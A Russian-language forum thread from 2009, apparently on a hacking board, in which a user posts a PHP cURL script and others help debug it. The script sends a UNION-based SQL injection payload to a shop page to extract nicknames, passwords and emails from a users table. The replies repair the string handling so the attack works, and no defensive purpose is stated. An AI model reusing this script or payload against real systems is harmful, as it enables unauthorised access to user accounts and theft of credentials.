CURL,Веля и инъекция.

Discussion in 'PHP' started by Велемир, 11 Mar 2009.

  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    День добрый (надеюсь).Такая вот канитель:

    PHP:

    <?php

    $url 
    'http://www.site.com/shop.php?st=2&movie=$request&id=676';
    $limit 0;
    $ref 'http://www.site.com/shop.php';
    $request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';
    $ua 'Fuck all!!!';
    $ch curl_init();

    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_REFERER,$ref);
    curl_setopt($ch,CURLOPT_HEADER,1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_USERAGENT,$ua);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
    curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
    curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
    $result curl_exec($ch);
    curl_close($ch);
    echo 
    $result;



    ?>

    Вроде посылаю правильно(опять-таки надеюсь).В чём может быть причина ? Проблем с получением самой страницы не возникает,но вот сам результат запроса(а он верный,уверяю вас,господа ))) ).Два варианта: либо я передал неправильно(GET запрос всё же),либо что-то ещё.

    ЗЫ: Самого результат SQL запроса из бд в ответе невидно :(

    ЗЫ2: Веля не тупой... Веля гуглил!(​
     
    #1 Велемир, 11 Mar 2009
    Last edited: 11 Mar 2009
    1 person likes this.
  2. 5triker

    5triker Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    62
    Likes Received:
    41
    Reputations:
    1
    вопще переменную , которая где то используется, нужно объявлять раньше того места

    PHP:
    <?php
    $request 
    '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*';
    $url 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
    $limit 0;
    $ref 'http://www.site.com/shop.php';
    $ua 'Fuck all!!!';
    $ch curl_init();

    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_REFERER,$ref);
    curl_setopt($ch,CURLOPT_HEADER,1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_USERAGENT,$ua);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
    curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
    curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
    $result curl_exec($ch);
    curl_close($ch);
    echo 
    $result;



    ?>
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Всё равно не помогло (,но всё равно пасип )
     
  4. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    А где строчка
    Code:
    curl_setopt($ch,CURLOPT_POSTFIELDS, $request); 
    ?
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Так это же не пост данные...оО

    ЗЫ: Пробывал и так,и эдак...всё мимо.
     
    #5 Велемир, 11 Mar 2009
    Last edited: 11 Mar 2009
  6. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    PHP:
    $url 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
    $limit 0;
    $ref 'http://www.site.com/shop.php';
    $request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*';
    Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова ..

    PHP:
    $request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';
    $url 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676';
    $limit 0;
    $ref 'http://www.site.com/shop.php';
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    PHP:

    $url 
    'http://www.site.com/shop.php?st=2&movie=-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.User limit 0,1/*&id=676';
    $ref 'http://www.site.com/shop.php';
    $ua 'Fuck you!!!';
    $ch curl_init();

    ...
    Тут код курлы...


    CURLOPT_POSTFIELDS Убрал,так как данные гет.Зато теперь на экране красуется бэд рекьюст)
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пасиппи,помог разобраться b3:):):) Объявляю время отдыха и всеобщего празднества!)))